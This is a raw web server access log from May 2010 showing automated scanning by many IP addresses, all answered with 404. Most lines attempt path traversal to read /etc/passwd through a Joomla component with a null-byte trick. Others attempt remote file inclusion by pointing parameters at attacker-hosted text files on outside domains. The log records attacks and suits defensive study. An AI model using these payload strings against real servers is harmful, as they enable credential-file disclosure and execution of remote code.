195.56.172.136 - - [08/May/2010:00:07:29 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.56.172.136 - - [08/May/2010:00:07:30 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
200.11.75.68 - - [08/May/2010:00:08:14 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:08:14 -0500] "GET /logs/access_log.1272067200%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:08:14 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:09:10 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.45.186.2 - - [08/May/2010:00:09:10 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
207.45.186.2 - - [08/May/2010:00:09:10 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.45.186.2 - - [08/May/2010:00:09:10 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
208.38.187.136 - - [08/May/2010:00:10:20 -0500] "GET ///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.38.187.136 - - [08/May/2010:00:10:20 -0500] "GET /logs///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
208.38.187.136 - - [08/May/2010:00:10:20 -0500] "GET /logs/access_log.1262476800///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.38.187.136 - - [08/May/2010:00:10:27 -0500] "GET /logs/access_log.1262995200///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.38.187.136 - - [08/May/2010:00:10:33 -0500] "GET /logs/access_log.1262476800///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.38.187.136 - - [08/May/2010:00:10:33 -0500] "GET ///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.38.187.136 - - [08/May/2010:00:10:33 -0500] "GET /logs///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
208.38.187.136 - - [08/May/2010:00:10:39 -0500] "GET /logs/access_log.1262995200///ask_password.php?dir=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:11:27 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:11:28 -0500] "GET /logs/access_log.1272067200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:11:28 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:12:01 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:12:01 -0500] "GET /logs/access_log.1272067200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:12:01 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:12:06 -0500] "GET /logs/access_log.1270598400//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.161.129 - - [08/May/2010:00:13:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
89.149.242.197 - - [08/May/2010:00:13:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.149.242.197 - - [08/May/2010:00:13:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
89.149.242.197 - - [08/May/2010:00:13:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
78.46.47.78 - - [08/May/2010:00:13:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
87.250.255.243 - - [08/May/2010:00:13:43 -0500] "GET /logs/access_log.1250208000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.16.214.18 - - [08/May/2010:00:13:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
207.45.186.2 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
91.121.30.72 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
85.19.150.100 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
94.23.9.179 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
89.149.242.197 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
69.16.214.18 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
208.78.41.116 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.228.152.176 - - [08/May/2010:00:13:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
69.16.214.18 - - [08/May/2010:00:13:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.56.172.136 - - [08/May/2010:00:13:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.16.214.18 - - [08/May/2010:00:13:45 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
204.188.235.66 - - [08/May/2010:00:13:46 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
208.43.48.82 - - [08/May/2010:00:13:47 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
67.205.2.183 - - [08/May/2010:00:13:48 -0500] "GET /logs/foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.205.2.183 - - [08/May/2010:00:13:48 -0500] "GET /foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
67.205.2.183 - - [08/May/2010:00:13:48 -0500] "GET /logs/access_log.1263772800/foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
89.108.70.32 - - [08/May/2010:00:13:55 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
67.205.2.183 - - [08/May/2010:00:14:00 -0500] "GET /foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
67.205.2.183 - - [08/May/2010:00:14:00 -0500] "GET /logs/foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.205.2.183 - - [08/May/2010:00:14:00 -0500] "GET /logs/access_log.1263772800/foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
207.45.186.2 - - [08/May/2010:00:14:10 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
207.45.186.2 - - [08/May/2010:00:14:10 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.45.186.2 - - [08/May/2010:00:14:11 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
67.205.2.183 - - [08/May/2010:00:14:12 -0500] "GET /logs/access_log.1266019200/foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
94.23.9.179 - - [08/May/2010:00:14:15 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
94.23.9.179 - - [08/May/2010:00:14:15 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
94.23.9.179 - - [08/May/2010:00:14:15 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.121.161.129 - - [08/May/2010:00:14:18 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.121.161.129 - - [08/May/2010:00:14:18 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
91.121.161.129 - - [08/May/2010:00:14:19 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.149.242.197 - - [08/May/2010:00:14:23 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
89.149.242.197 - - [08/May/2010:00:14:23 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.149.242.197 - - [08/May/2010:00:14:23 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
89.149.242.197 - - [08/May/2010:00:14:23 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
89.149.242.197 - - [08/May/2010:00:14:24 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
89.149.242.197 - - [08/May/2010:00:14:24 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.242.197 - - [08/May/2010:00:14:27 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
89.149.242.197 - - [08/May/2010:00:14:27 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
89.149.242.197 - - [08/May/2010:00:14:27 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
67.205.2.183 - - [08/May/2010:00:14:28 -0500] "GET /logs/access_log.1266019200/foro/?sourcedir=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
89.149.242.197 - - [08/May/2010:00:14:29 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
89.149.242.197 - - [08/May/2010:00:14:29 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
89.149.242.197 - - [08/May/2010:00:14:29 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.56.172.136 - - [08/May/2010:00:14:30 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.56.172.136 - - [08/May/2010:00:14:30 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.56.172.136 - - [08/May/2010:00:14:30 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
69.16.214.18 - - [08/May/2010:00:14:40 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.16.214.18 - - [08/May/2010:00:14:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.16.214.18 - - [08/May/2010:00:14:41 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.16.214.18 - - [08/May/2010:00:14:41 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.16.214.18 - - [08/May/2010:00:14:41 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
69.16.214.18 - - [08/May/2010:00:14:41 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
78.46.47.78 - - [08/May/2010:00:14:47 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
78.46.47.78 - - [08/May/2010:00:14:47 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
78.46.47.78 - - [08/May/2010:00:14:48 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
200.11.75.68 - - [08/May/2010:00:15:03 -0500] "GET /logs/access_log.1270598400//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.16.214.18 - - [08/May/2010:00:15:19 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.16.214.18 - - [08/May/2010:00:15:20 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
69.16.214.18 - - [08/May/2010:00:15:20 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
69.16.214.18 - - [08/May/2010:00:15:20 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
69.16.214.18 - - [08/May/2010:00:15:21 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
69.16.214.18 - - [08/May/2010:00:15:21 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.16.214.18 - - [08/May/2010:00:15:22 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
69.16.214.18 - - [08/May/2010:00:15:22 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
69.16.214.18 - - [08/May/2010:00:15:23 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
85.19.150.100 - - [08/May/2010:00:15:57 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
85.19.150.100 - - [08/May/2010:00:15:58 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
85.19.150.100 - - [08/May/2010:00:15:58 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
94.23.9.179 - - [08/May/2010:00:15:59 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
91.121.161.129 - - [08/May/2010:00:15:59 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.242.197 - - [08/May/2010:00:16:00 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.16.214.18 - - [08/May/2010:00:16:03 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
208.43.48.82 - - [08/May/2010:00:16:05 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
